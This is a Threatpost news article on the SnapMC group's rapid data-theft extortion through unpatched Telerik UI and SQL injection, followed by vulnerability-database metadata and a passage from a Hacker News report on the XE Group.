30 Mins or Less: Rapid Attacks Extort Orgs Without Ransomware

2021-10-13T11:22:00

Description

In less time than it takes to get a stuffed crust pizza delivered, a new group called SnapMC can breach an organization’s systems, steal their sensitive data, and demand payment to keep it from being published, according to a new [report from NCC Group’s threat intelligence team](<https://blog.fox-it.com/2021/10/11/snapmc-skips-ransomware-steals-data/>) — no ransomware required. Rather than disrupting business operations by locking down a target’s data and systems, SnapMC just focuses on straight-up extortion. However, this low-tech, ransomware-free approach to extortion on a compressed timeline relies on known vulnerabilities with patches readily available. “In the extortion emails we have seen from SnapMC have given victims 24 hours to get in contact and 72 hours to negotiate,” the report said. “These deadlines are rarely abided by, since we have seen the attacker to start increasing the pressure well before countdown hits zero.” The researchers weren’t able to link the group to any known threat actors and gave it the name for it’s speed (“Snap”) and its mc.exe exfiltration tool of choice. As evidence the group has the data, SnapMC provides victims with a list of the exfiltrated data. If they fail to engage in negotiations within the timeframe, the attackers threaten to publish the data and report the breach to customers and the media. Analysts said they’ve observed SnapMC successfully breaching unpatched and vulnerable VPNs using the [CVE-2019-18935](<https://nvd.nist.gov/vuln/detail/CVE-2019-18935>) remote code execution bug in Telerik UI for ASPX.NET, and webserver apps using SQL injections. ## **VPN Vulnerabilities ** A recent rise in VPN vulnerabilities has left companies exposed, according to Hank Schless, a senior manager with Lookout cloud security. “While VPN solutions have their place, there have been multiple stories of vulnerabilities within these solutions that were exploited in the wild,” Schless explained to Threatpost. “Ensuring that only authorized and secure users or devices can access corporate infrastructure requires zero trust network access (ZTNA) policies for on-premise or private apps and cloud access security broker (CASB) capabilities for cloud-based apps and infrastructure.” Last June the Colonial Pipeline was breached with an [old VPN password](<https://threatpost.com/darkside-pwned-colonial-with-old-vpn-password/166743/>). And last July [SonicWall issued a patch](<https://threatpost.com/sonicwall-vpn-bugs-attack/167824/>) for a bug in its old VPN models no longer supported by the company after attacks came to light — which were part of an ongoing wider campaign to exploit ([CVE-2019-7418](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=2019-7481>)). The following month, [Cisco Systems issued a handful of patches](<https://threatpost.com/critical-cisco-bug-vpn-routers/168449/>) for the 8,800 Gigabit VPN routers vulnerable to compromise through [CVE-2021-1609](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-1609>). And by late last month, the National Security Agency (NSA) and Cybersecurity and Infrastructure Security Agency (CSIA) issued guidance to the Department of Defense, National Security Systems and the Defense Industrial Base to [harden their VPNs](<https://threatpost.com/vpns-nsa-cisa-guidance/175150/>) against threats from multiple nation-state advanced persistent threat (APT) actors. Nation-state actors aside, basic patching would protect against this latest smash-and-grab attempt at data extortion from the likes of SnapMC. ## **Ransomware’s Evolution ** Oliver Tavakoli, CTO with Vectra, said that getting rid of the encryption piece of the attack altogether is a “natural evolution” of the ransomware [business model](<https://threatpost.com/ransomware-volumes-record-highs-2021/168327/>). The NCC team likewise predicts the trend toward simple attacks on shorter timelines is likely to continue. “NCC Group’s Threat Intelligence team predicts that data-breach extortion attacks will increase over time, as it takes less time, and even less technical in-depth knowledge or skill in comparison to a full-blown ransomware attack,” the team said. “Therefore, making sure you are able to detect such attacks in combination with having an incident response plan ready to execute at short notice, is vital to efficiently and effectively mitigate the threat SnapMC poses to your organization.” _**Check out our free **_[_**upcoming live and on-demand online **_](<https://threatpost.com/category/webinars/>)_**_town halls_**__** – unique, dynamic discussions with cybersecurity experts and the Threatpost community.**_

{"id": "THREATPOST:7EE86D3945B51C9DF608A4C06739A5F7", "vendorId": null, "type": "threatpost", "bulletinFamily": "info", "title": "30 Mins or Less: Rapid Attacks Extort Orgs Without Ransomware", "description": "In less time than it takes to get a stuffed crust pizza delivered, a new group called SnapMC can breach an organization\u2019s systems, steal their sensitive data, and demand payment to keep it from being published, according to a new [report from NCC Group\u2019s threat intelligence team](<https://blog.fox-it.com/2021/10/11/snapmc-skips-ransomware-steals-data/>) \u2014 no ransomware required.\n\nRather than disrupting business operations by locking down a target\u2019s data and systems, SnapMC just focuses on straight-up extortion. However, this low-tech, ransomware-free approach to extortion on a compressed timeline relies on known vulnerabilities with patches readily available.\n\n\u201cIn the extortion emails we have seen from SnapMC have given victims 24 hours to get in contact and 72 hours to negotiate,\u201d the report said. \u201cThese deadlines are rarely abided by, since we have seen the attacker to start increasing the pressure well before countdown hits zero.\u201d\n\nThe researchers weren\u2019t able to link the group to any known threat actors and gave it the name for it\u2019s speed (\u201cSnap\u201d) and its mc.exe exfiltration tool of choice.\n\nAs evidence the group has the data, SnapMC provides victims with a list of the exfiltrated data. If they fail to engage in negotiations within the timeframe, the attackers threaten to publish the data and report the breach to customers and the media.\n\nAnalysts said they\u2019ve observed SnapMC successfully breaching unpatched and vulnerable VPNs using the [CVE-2019-18935](<https://nvd.nist.gov/vuln/detail/CVE-2019-18935>) remote code execution bug in Telerik UI for ASPX.NET, and webserver apps using SQL injections.\n\n## **VPN Vulnerabilities **\n\nA recent rise in VPN vulnerabilities has left companies exposed, according to Hank Schless, a senior manager with Lookout cloud security.\n\n\u201cWhile VPN solutions have their place, there have been multiple stories of vulnerabilities within these solutions that were exploited in the wild,\u201d Schless explained to Threatpost. \u201cEnsuring that only authorized and secure users or devices can access corporate infrastructure requires zero trust network access (ZTNA) policies for on-premise or private apps and cloud access security broker (CASB) capabilities for cloud-based apps and infrastructure.\u201d\n\nLast June the Colonial Pipeline was breached with an [old VPN password](<https://threatpost.com/darkside-pwned-colonial-with-old-vpn-password/166743/>). And last July [SonicWall issued a patch](<https://threatpost.com/sonicwall-vpn-bugs-attack/167824/>) for a bug in its old VPN models no longer supported by the company after attacks came to light \u2014 which were part of an ongoing wider campaign to exploit ([CVE-2019-7418](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=2019-7481>)).\n\nThe following month, [Cisco Systems issued a handful of patches](<https://threatpost.com/critical-cisco-bug-vpn-routers/168449/>) for the 8,800 Gigabit VPN routers vulnerable to compromise through [CVE-2021-1609](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-1609>).\n\nAnd by late last month, the National Security Agency (NSA) and Cybersecurity and Infrastructure Security Agency (CSIA) issued guidance to the Department of Defense, National Security Systems and the Defense Industrial Base to [harden their VPNs](<https://threatpost.com/vpns-nsa-cisa-guidance/175150/>) against threats from multiple nation-state advanced persistent threat (APT) actors.\n\nNation-state actors aside, basic patching would protect against this latest smash-and-grab attempt at data extortion from the likes of SnapMC.\n\n## **Ransomware\u2019s Evolution **\n\nOliver Tavakoli, CTO with Vectra, said that getting rid of the encryption piece of the attack altogether is a \u201cnatural evolution\u201d of the ransomware [business model](<https://threatpost.com/ransomware-volumes-record-highs-2021/168327/>). The NCC team likewise predicts the trend toward simple attacks on shorter timelines is likely to continue.\n\n\u201cNCC Group\u2019s Threat Intelligence team predicts that data-breach extortion attacks will increase over time, as it takes less time, and even less technical in-depth knowledge or skill in comparison to a full-blown ransomware attack,\u201d the team said. \u201cTherefore, making sure you are able to detect such attacks in combination with having an incident response plan ready to execute at short notice, is vital to efficiently and effectively mitigate the threat SnapMC poses to your organization.\u201d\n\n_**Check out our free **_[_**upcoming live and on-demand online **_](<https://threatpost.com/category/webinars/>)_**_town halls_**__** \u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community.**_\n", "published": "2021-10-13T11:22:00", "modified": "2021-10-13T11:22:00", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://threatpost.com/rapid-attacks-extort-ransomware/175445/", "reporter": "Becky Bracken", "references": ["https://blog.fox-it.com/2021/10/11/snapmc-skips-ransomware-steals-data/", "https://nvd.nist.gov/vuln/detail/CVE-2019-18935", "https://threatpost.com/darkside-pwned-colonial-with-old-vpn-password/166743/", "https://threatpost.com/sonicwall-vpn-bugs-attack/167824/", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=2019-7481", "https://threatpost.com/critical-cisco-bug-vpn-routers/168449/", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-1609", "https://threatpost.com/vpns-nsa-cisa-guidance/175150/", "https://threatpost.com/ransomware-volumes-record-highs-2021/168327/", "https://threatpost.com/category/webinars/"], "cvelist": ["CVE-2019-18935", "CVE-2019-7418", "CVE-2021-1609"], "immutableFields": [], "lastseen": "2021-10-13T11:25:12", "viewCount": 31, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:90DDDBF9-EA58-4470-B821-C35007A64BD6"]}, {"type": "avleonov", "idList": ["AVLEONOV:6751C21C8E1FE44E934028BE65F47A85"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2019-1914"]}, {"type": "cisa_kev", "idList": ["CISA-KEV-CVE-2019-18935"]}, {"type": "cisco", "idList": ["CISCO-SA-RV340-CMDINJ-RCEDOS-PY8J3QFY"]}, {"type": "cnvd", "idList": ["CNVD-2021-59765"]}, {"type": "cve", "idList": ["CVE-2019-18935", "CVE-2019-7418", "CVE-2021-1609"]}, {"type": "exploitdb", "idList": ["EDB-ID:47793"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:AE2D3F648B410F57DC5F105EDA166E2B"]}, {"type": "githubexploit", "idList": ["05081BAE-6AEB-5206-8BEC-6D067EE4B660", "1741E720-F85A-5179-AB8A-D6FA2E185092", "46B4DA3A-0DEC-5F0E-980A-B17A1CB688F1", "6AF629CA-DC22-5740-AC2B-CA18189D299D", "92BBBF7B-026E-553A-883B-AEF503046C18", "A04C30E0-722D-5CF4-B80A-547C1C702024"]}, {"type": "hackerone", "idList": ["H1:1174185", "H1:838196", "H1:913695"]}, {"type": "ics", "idList": ["AA20-275A", "AA21-209A", "AA22-117A", "AA23-074A", "ICSA-21-077-03"]}, {"type": "impervablog", "idList": ["IMPERVABLOG:BB987E93C1A58280077D98CF497FD72D"]}, {"type": "kitploit", "idList": ["KITPLOIT:1207079539580982634"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT-WINDOWS-HTTP-TELERIK_RAU_DESERIALIZATION-"]}, {"type": "nessus", "idList": ["CISCO-SA-RV340-CMDINJ-RCEDOS-PY8J3QFY.NASL", "TELERIK_UI_FOR_ASPNET_AJAX_CVE-2019-18935.NASL", "WEB_APPLICATION_SCANNING_112521"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:151584", "PACKETSTORM:159653"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:8DC9B53E981BBE193F6EC369D7FA85F8", "QUALYSBLOG:DE1FEC2B9B661D42DAA0BA398DBFD24E"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:E8EB68630D38C60B7DE4AF696474210D"]}, {"type": "thn", "idList": ["THN:942BFBB34DF6A24E460572684F648005", "THN:B95DC27A89565323F0F8E6350D24D801", "THN:DA123F44DF01FC15E8AB38B124B06368"]}, {"type": "threatpost", "idList": ["THREATPOST:58D6B44423A20EFC8CC4AD8B195A7228", "THREATPOST:8EA8D0065DFF8156E96B2791BA08EF85", "THREATPOST:A94AAFAF28062A447CCD0F4C47FFD78C", "THREATPOST:D15D3ADBA9A153B33E9ADCC9E9D6E07D", "THREATPOST:F8F0749C57FDD3CABE842BDFEAD33452", "THREATPOST:FD8657F42A74CEDAA8D3F25A2362E6E8"]}, {"type": "veracode", "idList": ["VERACODE:25767"]}, {"type": "zdt", "idList": ["1337DAY-ID-33683", "1337DAY-ID-35085"]}]}, "score": {"value": -0.1, "vector": "NONE"}, "backreferences": {"references": [{"type": "attackerkb", "idList": ["AKB:90DDDBF9-EA58-4470-B821-C35007A64BD6"]}, {"type": "avleonov", "idList": ["AVLEONOV:6751C21C8E1FE44E934028BE65F47A85"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2019-1914"]}, {"type": "cisa", "idList": ["CISA:17ECE93409F2BF9846D576277DA8717C", "CISA:452D43AC6599B76DF22B4805470283C8", "CISA:8FAFD5A4573898E60D59E0AE79D28E99"]}, {"type": "cisco", "idList": ["CISCO-SA-RV340-CMDINJ-RCEDOS-PY8J3QFY"]}, {"type": "cve", "idList": ["CVE-2019-18935", "CVE-2019-7418", "CVE-2021-1609"]}, {"type": "exploitdb", "idList": ["EDB-ID:47793"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:AE2D3F648B410F57DC5F105EDA166E2B"]}, {"type": "githubexploit", "idList": ["05081BAE-6AEB-5206-8BEC-6D067EE4B660", "1741E720-F85A-5179-AB8A-D6FA2E185092", "46B4DA3A-0DEC-5F0E-980A-B17A1CB688F1", "6AF629CA-DC22-5740-AC2B-CA18189D299D", "92BBBF7B-026E-553A-883B-AEF503046C18", "A04C30E0-722D-5CF4-B80A-547C1C702024"]}, {"type": "hackerone", "idList": ["H1:838196"]}, {"type": "impervablog", "idList": ["IMPERVABLOG:BB987E93C1A58280077D98CF497FD72D"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/HTTP/TELERIK_RAU_DESERIALIZATION/"]}, {"type": "nessus", "idList": ["TELERIK_UI_FOR_ASPNET_AJAX_CVE-2019-18935.NASL", "WEB_APPLICATION_SCANNING_112521"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:151584"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:8DC9B53E981BBE193F6EC369D7FA85F8"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:E8EB68630D38C60B7DE4AF696474210D"]}, {"type": "thn", "idList": ["THN:942BFBB34DF6A24E460572684F648005", "THN:B95DC27A89565323F0F8E6350D24D801", "THN:DA123F44DF01FC15E8AB38B124B06368"]}, {"type": "threatpost", "idList": ["THREATPOST:050A36E6453D4472A2734DA342E95366", "THREATPOST:A94AAFAF28062A447CCD0F4C47FFD78C"]}, {"type": "zdt", "idList": ["1337DAY-ID-33683"]}]}, "exploitation": null, "epss": [{"cve": "CVE-2019-18935", "epss": "0.892700000", "percentile": "0.981160000", "modified": "2023-03-17"}, {"cve": "CVE-2019-7418", "epss": "0.002520000", "percentile": "0.613070000", "modified": "2023-03-17"}, {"cve": "CVE-2021-1609", "epss": "0.002040000", "percentile": "0.566480000", "modified": "2023-03-17"}], "vulnersScore": -0.1}, "_state": {"dependencies": 1678920471, "score": 1684009192, "epss": 1679134186}, "_internal": {"score_hash": "474334caee71f1ebb97f30df3b6a9266"}}

{"githubexploit": [{"lastseen": "2021-12-10T14:34:15", "description": "# TelerikUI Python Scanner\r\n(telerik_rce_scan.py)\r\n<img align=\"c...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-08-26T20:57:11", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Telerik Ui For Asp.Net Ajax", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-18935"], "modified": "2021-07-21T15:53:50", "id": "92BBBF7B-026E-553A-883B-AEF503046C18", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T14:30:16", "description": "# TelerikUI Python Scanner\r\n(telerik_rce_scan.py)\r\n<img align=\"c...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-05-25T08:37:51", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Telerik Ui For Asp.Net Ajax", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-18935"], "modified": "2021-08-17T19:04:54", "id": "05081BAE-6AEB-5206-8BEC-6D067EE4B660", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-09T01:53:05", "description": "# CVE-2019-18935\n\nProof-of-concept exploit for a .NET JSON deser...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-12-12T07:58:11", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Telerik Ui For Asp.Net Ajax", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-18935"], "modified": "2022-08-08T17:58:54", "id": "A04C30E0-722D-5CF4-B80A-547C1C702024", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-01-12T02:57:38", "description": "<b>[CVE-2019-18935] Telerik UI for ASP.NET AJAX (RadAsyncUpload ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-08-19T17:11:02", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Telerik Ui For Asp.Net Ajax", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-18935"], "modified": "2022-01-09T21:20:03", "id": "1741E720-F85A-5179-AB8A-D6FA2E185092", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-29T23:42:45", "description": "# RAU_crypto\n[![Language](https://img.shields.io/badge/Lang-Pyth...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-01-09T13:53:57", "type": "githubexploit", "title": "Exploit for Inadequate Encryption Strength in Telerik Ui For Asp.Net Ajax", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-18935", "CVE-2017-9248", "CVE-2017-11317", "CVE-2017-11357"], "modified": "2021-12-29T14:28:46", "id": "46B4DA3A-0DEC-5F0E-980A-B17A1CB688F1", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-02-01T00:00:00", "description": "# RAU_crypto\n[![Language](https://img.shields.io/badge/Lang-Pyth...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2020-05-29T07:29:52", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Telerik Ui For Asp.Net Ajax", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11357", "CVE-2019-18935", "CVE-2017-11317", "CVE-2017-9248"], "modified": "2022-02-07T03:27:52", "id": "6AF629CA-DC22-5740-AC2B-CA18189D299D", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}], "checkpoint_advisories": [{"lastseen": "2021-12-17T11:12:16", "description": "A remote code execution vulnerability exists in Progress Telerik UI for Asp.Net Ajax. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-03-09T00:00:00", "type": "checkpoint_advisories", "title": "Progress Telerik UI Remote Code Execution (CVE-2019-18935)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-18935"], "modified": "2021-09-19T00:00:00", "id": "CPAI-2019-1914", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "thn": [{"lastseen": "2023-06-01T16:21:29", "description": "[![Cybercrime Kingpin](data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAAC0lEQVR42mP8Xw8AAoMBgDTD2qgAAAAASUVORK5CYII=)](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEiRXwjJ2SJY2WItS7sHSTBTeKhOuoWZcJd5uh9k-fbGc8gH1YtBtB9CiCifJEGCflz6ZxFbNb5rQAQ0_YqfLfeN176Qz8JR8Ub-dU_P9eLMBH_pwGPdzRsv2ho3au00d4XggdypW7hZ4MnhsZGjBzaNLNeBIn9H045iynXe6NHJjFrGSNfnVwcajKmv/s728-e365/hacker.jpg>)\n\nCybersecurity researchers have unmasked the identity of one of the individuals who is believed to be associated with the e-crime actor known as **XE Group**.\n\nAccording to [Menlo Security](<https://www.menlosecurity.com/blog/not-your-average-joe-an-analysis-of-the-xegroups-attack-techniques/>), which pieced together the information from different online sources, \"Nguyen Huu Tai, who also goes by the names Joe Nguyen and Thanh Nguyen, has the strongest likelihood of being involved with the XE Group.\"\n\nXE Group (aka XeThanh), previously documented by [Malwarebytes](<https://www.malwarebytes.com/blog/news/2020/07/credit-card-skimmer-targets-asp-net-sites>) and [Volexity](<https://www.volexity.com/blog/2021/12/07/xe-group-exposed-8-years-of-hacking-card-skimming-for-profit/>), has a history of carrying out cyber criminal activities since at least 2013. It's suspected to be a threat actor of Vietnamese origin.\n\nSome of the entities targeted by the threat actor span government agencies, construction organizations, and healthcare sectors.\n\nIt's known to compromise internet-exposed servers with known exploits and monetize the intrusions by installing password theft or [credit card skimming code](<https://thehackernews.com/2023/04/attention-online-shoppers-dont-be.html>) for online services.\n\n\"As far back as 2014, the threat actor was seen creating [AutoIT scripts](<https://en.wikipedia.org/wiki/AutoIt>) that automatically generated emails and a rudimentary credit card validator for stolen credit cards,\" the cybersecurity company said.\n\n[![Cybercrime Kingpin](data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAAC0lEQVR42mP8Xw8AAoMBgDTD2qgAAAAASUVORK5CYII=)](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjQ2VzxFCtmuSepHl-d3zHE7XQEBiq8xiE5EFfY0zMTXmeDvRihUs93wGwoZXszCxSro7-FZePBkC2Hyx8YEBcqPrVZuIelXSJrkHD6yNlpRdJY0zMrOrDIQE1KVCKRPMtUIcexffgYIwTQVBwQM-o8Nz6bGAVqhe9k-7hq_yy1TNrZ2yrAyOAuCt9H/s728-e365/code.jpg>)\n\nEarlier this March, U.S. cybersecurity and intelligence authorities [revealed](<https://thehackernews.com/2023/03/multiple-hacker-groups-exploit-3-year.html>) XE Group's attempts to exploit a critical three-year-old security flaw in Progress Telerik devices (CVE-2019-18935, CVSS score: 9.8) to obtain a foothold.\n\nUPCOMING WEBINAR\n\n\ud83d\udd10 Mastering API Security: Understanding Your True Attack Surface\n\nDiscover the untapped vulnerabilities in your API ecosystem and take proactive steps towards ironclad security. Join our insightful webinar!\n\n[Join the Session](<https://thn.news/z-inside-2>)\n\nThe adversary has also attempted to gain access to corporate networks in the past through phishing emails sent out using fraudulent domains mimicking legitimate companies such as PayPal and eBay.\n\nBesides camouflaging .EXE files as .PNG files to avoid detection, select attacks have employed a web shell dubbed [ASPXSpy](<https://attack.mitre.org/software/S0073/>) to gain control of vulnerable systems.\n\n\"XE Group remains a continued threat to various sectors, including government agencies, construction organizations, and healthcare providers,\" the researchers said.\n\n 